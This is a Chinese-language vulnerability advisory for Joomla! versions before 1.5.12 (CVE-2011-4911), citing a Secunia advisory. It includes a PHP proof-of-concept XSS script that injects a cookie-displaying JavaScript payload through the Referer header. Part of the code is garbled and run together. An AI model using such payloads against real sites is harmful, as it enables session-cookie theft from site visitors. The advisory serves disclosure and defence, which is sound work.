受影响系统:
Joomla! Joomla! < 1.5.12
描述:
CVE ID: CVE-2011-4911
Joomla!是一款开放源码的内容管理系统(CMS)。
Joomla! 1.5.12之前版本没有在某些文件中执行JEXEC检查,可允许远程攻击者获取安装路径。
<*来源:Juan Galiana Lara (jgaliana@isecauditors.com)
链接:http://secunia.com/advisories/35668
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/* PoC: XSS Joomla 1.5.11 Juan Galiana Lara Internet Security Auditors Jun 2009 */ /* config */ $site=’localhost’; $path=’/joomla-1.5.11′; $cookname=’d85558a8cf943386aaa374896bfd3d99′; $cookvalue=’4ab56fdd83bcad86289726aead602699′; class cURL { var $headers; var $user_agent; var $compression; var $cookie_file; var $proxy; /* evil script */ var $xss=’alert(“PWN PWN PWN: ” + document.cookie);’; function cURL($cookies=TRUE,$cookie=’cookies.txt’,$compression=’gzip’,$proxy=”) { $this->headers[] = ‘Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8’; $this->headers[] = ‘Connection: Keep-Alive’; $this->headers[] = ‘Content-type: application/x-www-form-urlencoded;charset=UTF-8’; $this->headers[] = ‘Referer: “>get(‘http://’ . $site . $path . ‘/index.php?option=com_content&view=article&layout=form’); /* let’s execute some javascript.. }:-)*/ echo $c; ?>
建议:
厂商补丁:
Joomla!
——-
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
评论关闭。